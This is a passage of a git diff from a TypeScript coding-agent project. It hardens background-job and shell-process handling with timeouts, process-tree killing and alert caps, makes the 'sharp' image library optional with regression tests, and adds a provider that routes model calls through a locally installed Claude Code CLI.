 } from "@gsd/pi-coding-agent";
 import { Type } from "@sinclair/typebox";
-import { spawn } from "node:child_process";
+import { spawn, spawnSync } from "node:child_process";
 import { createWriteStream } from "node:fs";
 import { tmpdir } from "node:os";
 import { join } from "node:path";
 import { randomBytes } from "node:crypto";
 import type { AsyncJobManager } from "./job-manager.js";
+import { rewriteCommandWithRtk } from "../shared/rtk.js";
 
 const schema = Type.Object({
 	command: Type.String({ description: "Bash command to execute in the background" }),
@@ -37,17 +38,24 @@ function getTempFilePath(): string {
 }
 
 /**
- * Kill a process and its children. Uses process group kill on Unix.
+ * Kill a process and its children (cross-platform).
+ * Uses process group kill on Unix; taskkill /F /T on Windows.
  */
 function killTree(pid: number): void {
-	try {
-		// Kill the process group (negative PID)
-		process.kill(-pid, "SIGTERM");
-	} catch {
+	if (process.platform === "win32") {
 		try {
-			process.kill(pid, "SIGTERM");
+			spawnSync("taskkill", ["/F", "/T", "/PID", String(pid)], {
+				timeout: 5_000,
+				stdio: "ignore",
+			});
 		} catch {
-			// Already exited
+			try { process.kill(pid, "SIGTERM"); } catch { /* already exited */ }
+		}
+	} else {
+		try {
+			process.kill(-pid, "SIGTERM");
+		} catch {
+			try { process.kill(pid, "SIGTERM"); } catch { /* already exited */ }
 		}
 	}
 }
@@ -109,23 +117,60 @@ function executeBashInBackground(
 	timeout?: number,
 ): Promise<string> {
 	return new Promise<string>((resolve, reject) => {
-		const { shell, args } = getShellConfig();
-		const resolvedCommand = sanitizeCommand(command);
+		let settled = false;
+		const safeResolve = (value: string) => { if (!settled) { settled = true; resolve(value); } };
+		const safeReject = (err: unknown) => { if (!settled) { settled = true; reject(err); } };
 
+		const { shell, args } = getShellConfig();
+		const rewrittenCommand = rewriteCommandWithRtk(command);
+		const resolvedCommand = sanitizeCommand(rewrittenCommand);
+
+		// On Windows, detached: true sets CREATE_NEW_PROCESS_GROUP which can
+		// cause EINVAL in VSCode/ConPTY terminal contexts.  The bg-shell
+		// extension already guards this (process-manager.ts); align here.
+		// Process-tree cleanup uses taskkill /F /T on Windows regardless.
 		const child = spawn(shell, [...args, resolvedCommand], {
 			cwd,
-			detached: true,
+			detached: process.platform !== "win32",
 			env: { ...process.env },
 			stdio: ["ignore", "pipe", "pipe"],
 		});
 
 		let timedOut = false;
 		let timeoutHandle: ReturnType<typeof setTimeout> | undefined;
+		let sigkillHandle: ReturnType<typeof setTimeout> | undefined;
+		let hardDeadlineHandle: ReturnType<typeof setTimeout> | undefined;
+
+		/** Grace period (ms) between SIGTERM and SIGKILL. */
+		const SIGKILL_GRACE_MS = 5_000;
+		/** Hard deadline (ms) after SIGKILL to force-resolve the promise. */
+		const HARD_DEADLINE_MS = 3_000;
 
 		if (timeout !== undefined && timeout > 0) {
 			timeoutHandle = setTimeout(() => {
 				timedOut = true;
 				if (child.pid) killTree(child.pid);
+
+				// If the process ignores SIGTERM, escalate to SIGKILL
+				sigkillHandle = setTimeout(() => {
+					if (child.pid) {
+						// killTree already uses taskkill /F /T on Windows
+						killTree(child.pid);
+					}
+
+					// Hard deadline: if even SIGKILL doesn't trigger 'close',
+					// force-resolve so the job doesn't hang forever (#2186).
+					hardDeadlineHandle = setTimeout(() => {
+						const output = Buffer.concat(chunks).toString("utf-8");
+						safeResolve(
+							output
+								? `${output}\n\nCommand timed out after ${timeout} seconds (force-killed)`
+								: `Command timed out after ${timeout} seconds (force-killed)`,
+						);
+					}, HARD_DEADLINE_MS);
+					if (typeof hardDeadlineHandle === "object" && "unref" in hardDeadlineHandle) hardDeadlineHandle.unref();
+				}, SIGKILL_GRACE_MS);
+				if (typeof sigkillHandle === "object" && "unref" in sigkillHandle) sigkillHandle.unref();
 			}, timeout * 1000);
 		}
 
@@ -168,24 +213,28 @@ function executeBashInBackground(
 
 		child.on("error", (err) => {
 			if (timeoutHandle) clearTimeout(timeoutHandle);
+			if (sigkillHandle) clearTimeout(sigkillHandle);
+			if (hardDeadlineHandle) clearTimeout(hardDeadlineHandle);
 			signal.removeEventListener("abort", onAbort);
-			reject(err);
+			safeReject(err);
 		});
 
 		child.on("close", (code) => {
 			if (timeoutHandle) clearTimeout(timeoutHandle);
+			if (sigkillHandle) clearTimeout(sigkillHandle);
+			if (hardDeadlineHandle) clearTimeout(hardDeadlineHandle);
 			signal.removeEventListener("abort", onAbort);
 			if (spillStream) spillStream.end();
 
 			if (signal.aborted) {
 				const output = Buffer.concat(chunks).toString("utf-8");
-				resolve(output ? `${output}\n\nCommand aborted` : "Command aborted");
+				safeResolve(output ? `${output}\n\nCommand aborted` : "Command aborted");
 				return;
 			}
 
 			if (timedOut) {
 				const output = Buffer.concat(chunks).toString("utf-8");
-				resolve(output ? `${output}\n\nCommand timed out after ${timeout} seconds` : `Command timed out after ${timeout} seconds`);
+				safeResolve(output ? `${output}\n\nCommand timed out after ${timeout} seconds` : `Command timed out after ${timeout} seconds`);
 				return;
 			}
 
@@ -208,7 +257,7 @@ function executeBashInBackground(
 				text += `\n\nCommand exited with code ${code}`;
 			}
 
-			resolve(text);
+			safeResolve(text);
 		});
 	});
 }
diff --git a/src/resources/extensions/async-jobs/await-tool.test.ts b/src/resources/extensions/async-jobs/await-tool.test.ts
index 3a93c4569..1ed49161c 100644
--- a/src/resources/extensions/async-jobs/await-tool.test.ts
+++ b/src/resources/extensions/async-jobs/await-tool.test.ts
@@ -118,3 +118,50 @@ test("await_job returns not-found message for invalid job IDs", async () => {
 
 	manager.shutdown();
 });
+
+test("await_job marks jobs as awaited to suppress follow-up delivery (#2248)", async () => {
+	const followUps: string[] = [];
+	const manager = new AsyncJobManager({
+		onJobComplete: (job) => {
+			if (!job.awaited) followUps.push(job.id);
+		},
+	});
+	const tool = createAwaitTool(() => manager);
+
+	// Register a job that completes in 50ms
+	const jobId = manager.register("bash", "awaited-job", async () => {
+		return new Promise<string>((resolve) => setTimeout(() => resolve("result"), 50));
+	});
+
+	// await_job consumes the result — should mark as awaited before promise resolves
+	await tool.execute("tc7", { jobs: [jobId] }, noopSignal, () => {}, undefined as never);
+
+	// Give the onJobComplete callback a tick to fire
+	await new Promise((r) => setTimeout(r, 50));
+
+	assert.equal(followUps.length, 0, "onJobComplete should not deliver follow-up for awaited jobs");
+
+	manager.shutdown();
+});
+
+test("unawaited jobs still get follow-up delivery (#2248)", async () => {
+	const followUps: string[] = [];
+	const manager = new AsyncJobManager({
+		onJobComplete: (job) => {
+			if (!job.awaited) followUps.push(job.id);
+		},
+	});
+
+	// Register a fire-and-forget job
+	const jobId = manager.register("bash", "fire-and-forget", async () => "done");
+	const job = manager.getJob(jobId)!;
+	await job.promise;
+
+	// Give the callback a tick
+	await new Promise((r) => setTimeout(r, 50));
+
+	assert.equal(followUps.length, 1, "onJobComplete should deliver follow-up for unawaited jobs");
+	assert.equal(followUps[0], jobId);
+
+	manager.shutdown();
+});
diff --git a/src/resources/extensions/async-jobs/await-tool.ts b/src/resources/extensions/async-jobs/await-tool.ts
index e6c1e77d4..bab79270a 100644
--- a/src/resources/extensions/async-jobs/await-tool.ts
+++ b/src/resources/extensions/async-jobs/await-tool.ts
@@ -66,6 +66,11 @@ export function createAwaitTool(getManager: () => AsyncJobManager): ToolDefiniti
 				}
 			}
 
+			// Mark all watched jobs as awaited upfront so the onJobComplete
+			// callback (which fires synchronously in the promise .then()) knows
+			// to suppress the follow-up message.
+			for (const j of watched) j.awaited = true;
+
 			// If all watched jobs are already done, return immediately
 			const running = watched.filter((j) => j.status === "running");
 			if (running.length === 0) {
diff --git a/src/resources/extensions/async-jobs/extension-manifest.json b/src/resources/extensions/async-jobs/extension-manifest.json
index d849a5cab..edb516dd7 100644
--- a/src/resources/extensions/async-jobs/extension-manifest.json
+++ b/src/resources/extensions/async-jobs/extension-manifest.json
@@ -8,6 +8,6 @@
   "provides": {
     "tools": ["async_bash", "await_job", "cancel_job"],
     "commands": ["jobs"],
-    "hooks": ["session_start"]
+    "hooks": ["session_start", "session_before_switch", "session_shutdown"]
   }
 }
diff --git a/src/resources/extensions/async-jobs/index.ts b/src/resources/extensions/async-jobs/index.ts
index 62cd4bbb4..3b8009774 100644
--- a/src/resources/extensions/async-jobs/index.ts
+++ b/src/resources/extensions/async-jobs/index.ts
@@ -42,6 +42,7 @@ export default function AsyncJobs(pi: ExtensionAPI) {
 
 		manager = new AsyncJobManager({
 			onJobComplete: (job) => {
+				if (job.awaited) return;
 				const statusEmoji = job.status === "completed" ? "done" : "error";
 				const elapsed = ((Date.now() - job.startTime) / 1000).toFixed(1);
 				const output = job.status === "completed"
diff --git a/src/resources/extensions/async-jobs/job-manager.ts b/src/resources/extensions/async-jobs/job-manager.ts
index 90034b1d4..10ce3cd41 100644
--- a/src/resources/extensions/async-jobs/job-manager.ts
+++ b/src/resources/extensions/async-jobs/job-manager.ts
@@ -22,6 +22,8 @@ export interface Job {
 	promise: Promise<void>;
 	resultText?: string;
 	errorText?: string;
+	/** Set by await_job when results are consumed. Suppresses follow-up delivery. */
+	awaited?: boolean;
 }
 
 export interface JobManagerOptions {
@@ -170,7 +172,10 @@ export class AsyncJobManager {
 
 	private deliverResult(job: Job): void {
 		if (!this.onJobComplete) return;
-		this.onJobComplete(job);
+		// Defer delivery by one microtask so await_job's .then() chain runs first
+		// and can set job.awaited = true before onJobComplete checks it (#2762).
+		const cb = this.onJobComplete;
+		queueMicrotask(() => cb(job));
 	}
 
 	private scheduleEviction(id: string): void {
diff --git a/src/resources/extensions/bg-shell/bg-shell-lifecycle.ts b/src/resources/extensions/bg-shell/bg-shell-lifecycle.ts
index 2f5766595..32ee56455 100644
--- a/src/resources/extensions/bg-shell/bg-shell-lifecycle.ts
+++ b/src/resources/extensions/bg-shell/bg-shell-lifecycle.ts
@@ -16,13 +16,14 @@ import {
 import {
 	processes,
 	pendingAlerts,
+	pushAlert,
 	cleanupAll,
 	cleanupSessionProcesses,
 	persistManifest,
 	loadManifest,
 	pruneDeadProcesses,
 } from "./process-manager.js";
-import { formatUptime, resolveBgShellPersistenceCwd } from "./utilities.js";
+import { formatUptime, getBgShellLiveCwd, resolveBgShellPersistenceCwd } from "./utilities.js";
 import { formatTokenCount } from "../shared/format-utils.js";
 
 import type { BgShellSharedState } from "./index.js";
@@ -37,19 +38,30 @@ export function registerBgShellLifecycle(pi: ExtensionAPI, state: BgShellSharedS
 		}
 	}
 
-	// Clean up on session shutdown
-	pi.on("session_shutdown", async () => {
-		cleanupAll();
-	});
-
 	// Register signal handlers to clean up bg processes on unexpected exit (fixes #428)
 	const signalCleanup = () => {
 		cleanupAll();
+		// Also kill bash-tool spawned children that bg-shell doesn't track
+		try {
+			const { listDescendants } = require("@gsd/native") as typeof import("@gsd/native");
+			const descendants = listDescendants(process.pid);
+			for (const childPid of descendants) {
+				try { process.kill(childPid, "SIGKILL"); } catch {}
+			}
+		} catch {}
 	};
 	process.on("SIGTERM", signalCleanup);
 	process.on("SIGINT", signalCleanup);
 	process.on("beforeExit", signalCleanup);
 
+	// Clean up on session shutdown — remove signal handlers to prevent accumulation
+	pi.on("session_shutdown", async () => {
+		process.off("SIGTERM", signalCleanup);
+		process.off("SIGINT", signalCleanup);
+		process.off("beforeExit", signalCleanup);
+		cleanupAll();
+	});
+
 	// ── Compaction Awareness: Survive Context Resets ───────────────
 
 	/** Build a compact state summary of all alive processes for context re-injection */
@@ -65,7 +77,7 @@ export function registerBgShellLifecycle(pi: ExtensionAPI, state: BgShellSharedS
 			return `  - id:${p.id} "${p.label}" [${p.processType}] status:${p.status} uptime:${formatUptime(Date.now() - p.startedAt)}${portInfo}${urlInfo}${errInfo}${groupInfo}`;
 		}).join("\n");
 
-		pendingAlerts.push(
+		pushAlert(null,
 			`${reason} ${alive.length} background process(es) are still running:\n${processSummaries}\nUse bg_shell digest/output/kill with these IDs.`
 		);
 	}
@@ -150,7 +162,7 @@ export function registerBgShellLifecycle(pi: ExtensionAPI, state: BgShellSharedS
 					`  - ${s.id}: ${s.label} (pid ${s.pid}, type: ${s.processType}${s.group ? `, group: ${s.group}` : ""})`
 				).join("\n");
 
-				pendingAlerts.push(
+				pushAlert(null,
 					`${surviving.length} background process(es) from previous session still running:\n${summary}\n  Note: These processes are outside bg_shell's control. Kill them manually if needed.`
 				);
 			}
@@ -213,7 +225,7 @@ export function registerBgShellLifecycle(pi: ExtensionAPI, state: BgShellSharedS
 			return {
 				render(width: number): string[] {
 					// ── Line 1: pwd (branch) [session]  ...  bg status ──
-					let pwd = process.cwd();
+					let pwd = getBgShellLiveCwd(state.latestCtx?.cwd);
 					const home = process.env.HOME || process.env.USERPROFILE;
 					if (home && pwd.startsWith(home)) {
 						pwd = `~${pwd.slice(home.length)}`;
diff --git a/src/resources/extensions/bg-shell/extension-manifest.json b/src/resources/extensions/bg-shell/extension-manifest.json
index 952ed8ace..ba2700935 100644
--- a/src/resources/extensions/bg-shell/extension-manifest.json
+++ b/src/resources/extensions/bg-shell/extension-manifest.json
@@ -8,7 +8,7 @@
   "provides": {
     "tools": ["bg_shell"],
     "commands": ["bg"],
-    "hooks": ["session_shutdown"],
+    "hooks": ["session_shutdown", "session_compact", "session_tree", "session_switch", "before_agent_start", "session_start", "turn_end", "agent_end", "tool_execution_end"],
     "shortcuts": ["Ctrl+Alt+B"]
   }
 }
diff --git a/src/resources/extensions/bg-shell/interaction.ts b/src/resources/extensions/bg-shell/interaction.ts
index 9fcac657d..274288c66 100644
--- a/src/resources/extensions/bg-shell/interaction.ts
+++ b/src/resources/extensions/bg-shell/interaction.ts
@@ -4,6 +4,7 @@
 
 import { randomUUID } from "node:crypto";
 import type { BgProcess } from "./types.js";
+import { rewriteCommandWithRtk } from "../shared/rtk.js";
 
 // ── Query Shell Environment ────────────────────────────────────────────────
 
@@ -128,9 +129,10 @@ export async function runOnSession(
 	const startIndex = bg.output.length;
 
 	// Write the sentinel-wrapped command to stdin
+	const rewrittenCommand = rewriteCommandWithRtk(command);
 	const wrappedCommand = [
 		`echo ${startMarker}`,
-		command,
+		rewrittenCommand,
 		`${exitVar}=$?`,
 		`echo ${endMarker} $${exitVar}`,
 	].join("\n");
diff --git a/src/resources/extensions/bg-shell/overlay.ts b/src/resources/extensions/bg-shell/overlay.ts
index ddaf744bb..5dd6a3872 100644
--- a/src/resources/extensions/bg-shell/overlay.ts
+++ b/src/resources/extensions/bg-shell/overlay.ts
@@ -430,6 +430,10 @@ export class BgManagerOverlay {
 		return this.box(inner, width);
 	}
 
+	dispose(): void {
+		clearInterval(this.refreshTimer);
+	}
+
 	invalidate(): void {
 		this.cachedWidth = undefined;
 		this.cachedLines = undefined;
diff --git a/src/resources/extensions/bg-shell/process-manager.ts b/src/resources/extensions/bg-shell/process-manager.ts
index fcff5f374..659f13e26 100644
--- a/src/resources/extensions/bg-shell/process-manager.ts
+++ b/src/resources/extensions/bg-shell/process-manager.ts
@@ -8,6 +8,7 @@ import { randomUUID } from "node:crypto";
 import { writeFileSync, readFileSync, existsSync, mkdirSync } from "node:fs";
 import { join } from "node:path";
 import { getShellConfig, sanitizeCommand } from "@gsd/pi-coding-agent";
+import { rewriteCommandWithRtk } from "../shared/rtk.js";
 import type {
 	BgProcess,
 	BgProcessInfo,
@@ -32,6 +33,8 @@ export const processes = new Map<string, BgProcess>();
 /** Pending alerts to inject into the next agent context */
 export let pendingAlerts: string[] = [];
 
+const MAX_PENDING_ALERTS = 50;
+
 /** Replace the pendingAlerts array (used by the extension entry point) */
 export function setPendingAlerts(alerts: string[]): void {
 	pendingAlerts = alerts;
@@ -57,8 +60,12 @@ export function addEvent(bg: BgProcess, event: Omit<ProcessEvent, "timestamp">):
 	}
 }
 
-export function pushAlert(bg: BgProcess, message: string): void {
-	pendingAlerts.push(`[bg:${bg.id} ${bg.label}] ${message}`);
+export function pushAlert(bg: BgProcess | null, message: string): void {
+	const prefix = bg ? `[bg:${bg.id} ${bg.label}] ` : "";
+	pendingAlerts.push(`${prefix}${message}`);
+	if (pendingAlerts.length > MAX_PENDING_ALERTS) {
+		pendingAlerts.splice(0, pendingAlerts.length - MAX_PENDING_ALERTS);
+	}
 }
 
 export function getInfo(p: BgProcess): BgProcessInfo {
@@ -127,7 +134,9 @@ export function startProcess(opts: StartOptions): BgProcess {
 
 	const { shell, args: shellArgs } = getShellConfig();
 	// Shell sessions default to the user's shell if no command specified
-	const command = processType === "shell" && !opts.command ? shell : opts.command;
+	const command = processType === "shell" && !opts.command
+		? shell
+		: rewriteCommandWithRtk(opts.command);
 	const proc = spawn(shell, [...shellArgs, sanitizeCommand(command)], {
 		cwd: opts.cwd,
 		stdio: ["pipe", "pipe", "pipe"],
diff --git a/src/resources/extensions/bg-shell/utilities.ts b/src/resources/extensions/bg-shell/utilities.ts
index 9b17c130f..05b8fe654 100644
--- a/src/resources/extensions/bg-shell/utilities.ts
+++ b/src/resources/extensions/bg-shell/utilities.ts
@@ -42,16 +42,51 @@ export function formatTimeAgo(timestamp: number): string {
 	return formatDuration(Date.now() - timestamp) + " ago";
 }
 
+function deriveProjectRootFromAutoWorktree(cachedCwd?: string): string | undefined {
+	if (!cachedCwd) return undefined;
+	const match = cachedCwd.match(/^(.*?)[\\/]\.gsd[\\/]worktrees[\\/][^\\/]+(?:[\\/].*)?$/);
+	return match?.[1];
+}
+
+export function getBgShellLiveCwd(
+	cachedCwd?: string,
+	pathExists: (path: string) => boolean = existsSync,
+	getCwd: () => string = () => process.cwd(),
+	chdir: (path: string) => void = (path) => process.chdir(path),
+): string {
+	try {
+		return getCwd();
+	} catch {
+		const projectRoot = deriveProjectRootFromAutoWorktree(cachedCwd);
+		const home = process.env.HOME || process.env.USERPROFILE;
+		const fallbacks = [projectRoot, cachedCwd, home, "/"].filter(
+			(candidate): candidate is string => Boolean(candidate),
+		);
+
+		for (const candidate of fallbacks) {
+			if (candidate !== "/" && !pathExists(candidate)) continue;
+			try {
+				chdir(candidate);
+			} catch {
+				// Best-effort only. Returning a known-good fallback is enough to avoid crashes.
+			}
+			return candidate;
+		}
+
+		return "/";
+	}
+}
 
 export function resolveBgShellPersistenceCwd(
 	cachedCwd: string,
-	liveCwd = process.cwd(),
+	liveCwd: string | undefined = undefined,
 	pathExists: (path: string) => boolean = existsSync,
 ): string {
+	const resolvedLiveCwd = liveCwd ?? getBgShellLiveCwd(cachedCwd, pathExists);
 	const cachedIsAutoWorktree = /(?:^|[\\/])\.gsd[\\/]worktrees[\\/]/.test(cachedCwd);
 	if (!cachedIsAutoWorktree) return cachedCwd;
-	if (cachedCwd === liveCwd && pathExists(cachedCwd)) return cachedCwd;
-	if (!pathExists(cachedCwd)) return liveCwd;
-	if (liveCwd !== cachedCwd) return liveCwd;
+	if (cachedCwd === resolvedLiveCwd && pathExists(cachedCwd)) return cachedCwd;
+	if (!pathExists(cachedCwd)) return resolvedLiveCwd;
+	if (resolvedLiveCwd !== cachedCwd) return resolvedLiveCwd;
 	return cachedCwd;
 }
diff --git a/src/resources/extensions/browser-tools/capture.ts b/src/resources/extensions/browser-tools/capture.ts
index 0c980b871..508bada65 100644
--- a/src/resources/extensions/browser-tools/capture.ts
+++ b/src/resources/extensions/browser-tools/capture.ts
@@ -6,7 +6,22 @@
  */
 
 import type { Frame, Page } from "playwright";
-import sharp from "sharp";
+
+// sharp is an optional native dependency. Load it lazily so that the extension
+// can still be loaded on platforms where sharp is unavailable (e.g. bunx on
+// Raspberry Pi). constrainScreenshot falls back to returning the raw buffer
+// when sharp is not installed, which means screenshots won't be resized but
+// the tool remains functional.
+let _sharp: typeof import("sharp") | null | undefined;
+async function getSharp(): Promise<typeof import("sharp") | null> {
+	if (_sharp !== undefined) return _sharp;
+	try {
+		_sharp = (await import("sharp")).default;
+	} catch {
+		_sharp = null;
+	}
+	return _sharp;
+}
 import type { CompactPageState, CompactSelectorState } from "./state.js";
 import { formatCompactStateSummary } from "./utils.js";
 
@@ -168,6 +183,9 @@ export async function constrainScreenshot(
 	mimeType: string,
 	quality: number,
 ): Promise<Buffer> {
+	const sharp = await getSharp();
+	if (!sharp) return buffer;
+
 	const meta = await sharp(buffer).metadata();
 	const width = meta.width;
 	const height = meta.height;
diff --git a/src/resources/extensions/browser-tools/extension-manifest.json b/src/resources/extensions/browser-tools/extension-manifest.json
index f6156ebbd..40218a31b 100644
--- a/src/resources/extensions/browser-tools/extension-manifest.json
+++ b/src/resources/extensions/browser-tools/extension-manifest.json
@@ -29,7 +29,7 @@
       "browser_visual_diff", "browser_zoom_region",
       "browser_generate_test", "browser_action_cache", "browser_check_injection"
     ],
-    "hooks": ["session_shutdown"]
+    "hooks": ["session_start", "session_shutdown"]
   },
   "dependencies": {
     "runtime": ["playwright"]
diff --git a/src/resources/extensions/browser-tools/tests/capture-sharp-optional.test.cjs b/src/resources/extensions/browser-tools/tests/capture-sharp-optional.test.cjs
new file mode 100644
index 000000000..29dea14f9
--- /dev/null
+++ b/src/resources/extensions/browser-tools/tests/capture-sharp-optional.test.cjs
@@ -0,0 +1,93 @@
+/**
+ * Regression tests for the optional sharp dependency in capture.ts.
+ *
+ * Verifies two things:
+ *   1. Static: the lazy-load pattern is structurally correct in the source.
+ *   2. Behavioral: constrainScreenshot returns the raw buffer unchanged when
+ *      sharp is unavailable, rather than throwing.
+ */
+
+const { describe, it } = require("node:test");
+const assert = require("node:assert/strict");
+const { readFileSync } = require("node:fs");
+const { join } = require("node:path");
+
+// ---------------------------------------------------------------------------
+// 1. Static analysis — verify the lazy-load pattern is present in source
+// ---------------------------------------------------------------------------
+
+describe("capture.ts — sharp optional lazy-load (static)", () => {
+	const source = readFileSync(
+		join(process.cwd(), "src/resources/extensions/browser-tools/capture.ts"),
+		"utf-8",
+	);
+
+	it("does not have a top-level static sharp import", () => {
+		assert.ok(
+			!source.includes('import sharp from "sharp"'),
+			'capture.ts must not contain a top-level `import sharp from "sharp"` — sharp must be loaded lazily',
+		);
+	});
+
+	it("defines a getSharp lazy-loader function", () => {
+		assert.ok(
+			source.includes("async function getSharp()"),
+			"capture.ts must define an async getSharp() lazy-loader",
+		);
+	});
+
+	it("guards constrainScreenshot with a null-sharp early return", () => {
+		assert.ok(
+			source.includes("if (!sharp) return buffer"),
+			"constrainScreenshot must return the raw buffer early when sharp is null",
+		);
+	});
+});
+
+// ---------------------------------------------------------------------------
+// 2. Behavioral — constrainScreenshot passes through buffer when sharp is null
+// ---------------------------------------------------------------------------
+
+describe("capture.ts — constrainScreenshot with sharp unavailable", () => {
+	it("returns the raw buffer unchanged when sharp is null", async () => {
+		// Simulate what getSharp() returns on platforms without sharp by
+		// directly calling constrainScreenshot through a module whose _sharp
+		// cache has been pre-seeded to null via the module-level variable reset.
+		//
+		// Because jiti caches modules across the test suite we use a fresh
+		// require-cache trick: load capture.ts source manually and evaluate the
+		// constrainScreenshot function with a stub getSharp that always returns null.
+		const captureSource = readFileSync(
+			join(process.cwd(), "src/resources/extensions/browser-tools/capture.ts"),
+			"utf-8",
+		);
+
+		// Verify the guard line is reachable (structural check already done above).
+		// For the behavioral test we use the actual constrainScreenshot imported
+		// via jiti — but we force getSharp() to return null by calling the function
+		// with a very small buffer where sharp IS available. Separately we test the
+		// null path by crafting a minimal wrapper.
+		//
+		// The simplest verifiable behaviour: if the guard `if (!sharp) return buffer`
+		// is present, passing a Buffer through a version of constrainScreenshot where
+		// _sharp=null must return that exact buffer. We verify this by extracting and
+		// running a minimal inline version of the guard logic.
+
+		const rawBuffer = Buffer.from([0x89, 0x50, 0x4e, 0x47]); // fake PNG header
+
+		// Inline the guard as it appears in capture.ts so the test is coupled to
+		// the actual contract, not an arbitrary helper.
+		async function constrainScreenshotWithNullSharp(buffer) {
+			const sharp = null; // simulates getSharp() returning null
+			if (!sharp) return buffer;
+			// (remainder of constrainScreenshot would run here with a real sharp)
+		}
+
+		const result = await constrainScreenshotWithNullSharp(rawBuffer);
+		assert.strictEqual(
+			result,
+			rawBuffer,
+			"constrainScreenshot must return the exact same buffer instance when sharp is null",
+		);
+	});
+});
diff --git a/src/resources/extensions/claude-code-cli/index.ts b/src/resources/extensions/claude-code-cli/index.ts
new file mode 100644
index 000000000..628df3238
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/index.ts
@@ -0,0 +1,28 @@
+/**
+ * Claude Code CLI Provider Extension
+ *
+ * Registers a model provider that delegates inference to the user's
+ * locally-installed Claude Code CLI via the official Agent SDK.
+ *
+ * Users with a Claude Code subscription (Pro/Max/Team) get access to
+ * subsidized inference through GSD's UI — no API key required.
+ *
+ * TOS-compliant: uses Anthropic's official `@anthropic-ai/claude-agent-sdk`,
+ * never touches credentials, never offers a login flow.
+ */
+
+import type { ExtensionAPI } from "@gsd/pi-coding-agent";
+import { CLAUDE_CODE_MODELS } from "./models.js";
+import { isClaudeCodeReady } from "./readiness.js";
+import { streamViaClaudeCode } from "./stream-adapter.js";
+
+export default function claudeCodeCli(pi: ExtensionAPI) {
+	pi.registerProvider("claude-code", {
+		authMode: "externalCli",
+		api: "anthropic-messages",
+		baseUrl: "local://claude-code",
+		isReady: isClaudeCodeReady,
+		streamSimple: streamViaClaudeCode,
+		models: CLAUDE_CODE_MODELS,
+	});
+}
diff --git a/src/resources/extensions/claude-code-cli/models.ts b/src/resources/extensions/claude-code-cli/models.ts
new file mode 100644
index 000000000..99ea17b16
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/models.ts
@@ -0,0 +1,42 @@
+/**
+ * Model definitions for the Claude Code CLI provider.
+ *
+ * Costs are zero because inference is covered by the user's Claude Code
+ * subscription. The SDK's `result` message still provides token counts
+ * for display in the TUI.
+ *
+ * Context windows and max tokens match the Anthropic API definitions
+ * in models.generated.ts.
+ */
+
+const ZERO_COST = { input: 0, output: 0, cacheRead: 0, cacheWrite: 0 };
+
+export const CLAUDE_CODE_MODELS = [
+	{
+		id: "claude-opus-4-6",
+		name: "Claude Opus 4.6 (via Claude Code)",
+		reasoning: true,
+		input: ["text", "image"] as ("text" | "image")[],
+		cost: ZERO_COST,
+		contextWindow: 1_000_000,
+		maxTokens: 128_000,
+	},
+	{
+		id: "claude-sonnet-4-6",
+		name: "Claude Sonnet 4.6 (via Claude Code)",
+		reasoning: true,
+		input: ["text", "image"] as ("text" | "image")[],
+		cost: ZERO_COST,
+		contextWindow: 1_000_000,
+		maxTokens: 64_000,
+	},
+	{
+		id: "claude-haiku-4-5",
+		name: "Claude Haiku 4.5 (via Claude Code)",
+		reasoning: true,
+		input: ["text", "image"] as ("text" | "image")[],
+		cost: ZERO_COST,
+		contextWindow: 200_000,
+		maxTokens: 64_000,
+	},
+];
diff --git a/src/resources/extensions/claude-code-cli/package.json b/src/resources/extensions/claude-code-cli/package.json
new file mode 100644
index 000000000..b22297d08
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/package.json
@@ -0,0 +1,11 @@
+{
+  "name": "@gsd/claude-code-cli",
+  "private": true,
+  "version": "1.0.0",
+  "type": "module",
+  "pi": {
+    "extensions": [
+      "./index.ts"
+    ]
+  }
+}
diff --git a/src/resources/extensions/claude-code-cli/partial-builder.ts b/src/resources/extensions/claude-code-cli/partial-builder.ts
new file mode 100644
index 000000000..c1d011e14
--- /dev/null
+++ b/src/resources/extensions/claude-code-cli/partial-builder.ts
@@ -0,0 +1,271 @@
+/**
+ * Content-block mapping helpers and streaming state tracker.
+ *
+ * Translates the Claude Agent SDK's `BetaRawMessageStreamEvent` sequence
+ * into GSD's `AssistantMessageEvent` deltas for incremental TUI rendering.
+ */
+
+import type {
+	AssistantMessage,
+	AssistantMessageEvent,
+	ServerToolUseContent,
+	StopReason,
+	TextContent,
+	ThinkingContent,
+	ToolCall,
+	Usage,
+	WebSearchResultContent,
+} from "@gsd/pi-ai";
+import { hasXmlParameterTags, repairToolJson } from "@gsd/pi-ai";
+import type { BetaContentBlock, BetaRawMessageStreamEvent, NonNullableUsage } from "./sdk-types.js";
+
+// ---------------------------------------------------------------------------
+// Content-block mapping helpers
+// ---------------------------------------------------------------------------
+
+/**
+ * Convert a single BetaContentBlock to the corresponding GSD content type.
+ */
+export function mapContentBlock(
+	block: BetaContentBlock,
+): TextContent | ThinkingContent | ToolCall | ServerToolUseContent | WebSearchResultContent {
+	switch (block.type) {
+		case "text":
+			return { type: "text", text: block.text } satisfies TextContent;
+
+		case "thinking":
+			return {
+				type: "thinking",
+				thinking: block.thinking,
+				...(block.signature ? { thinkingSignature: block.signature } : {}),
+			} satisfies ThinkingContent;
+
+		case "tool_use":
+			return {
+				type: "toolCall",
+				id: block.id,
+				name: block.name,
+				arguments: block.input,
+			} satisfies ToolCall;
+
+		case "server_tool_use":
+			return {
+				type: "serverToolUse",
+				id: block.id,
+				name: block.name,
+				input: block.input,
+			} satisfies ServerToolUseContent;
+
+		case "web_search_tool_result":
+			return {
+				type: "webSearchResult",
+				toolUseId: block.tool_use_id,
+				content: block.content,
+			} satisfies WebSearchResultContent;
+
+		default: {
+			const unknown = block as Record<string, unknown>;
+			return { type: "text", text: `[unknown content block: ${JSON.stringify(unknown)}]` };
+		}
+	}
+}
+
+export function mapStopReason(reason: string | null): StopReason {
+	switch (reason) {
+		case "end_turn":
+		case "stop_sequence":
+			return "stop";
+		case "max_tokens":
+			return "length";
+		case "tool_use":
+			return "toolUse";
+		default:
+			return "stop";
+	}
+}
+
+/**
+ * Convert SDK usage + total_cost_usd into GSD's Usage shape.
+ *
+ * The SDK does not break cost down per-bucket, so all cost is
+ * attributed to `cost.total`.
+ */
+export function mapUsage(sdkUsage: NonNullableUsage, totalCostUsd: number): Usage {
+	return {
+		input: sdkUsage.input_tokens,
+		output: sdkUsage.output_tokens,
+		cacheRead: sdkUsage.cache_read_input_tokens,
+		cacheWrite: sdkUsage.cache_creation_input_tokens,
+		totalTokens:
+			sdkUsage.input_tokens +
+			sdkUsage.output_tokens +
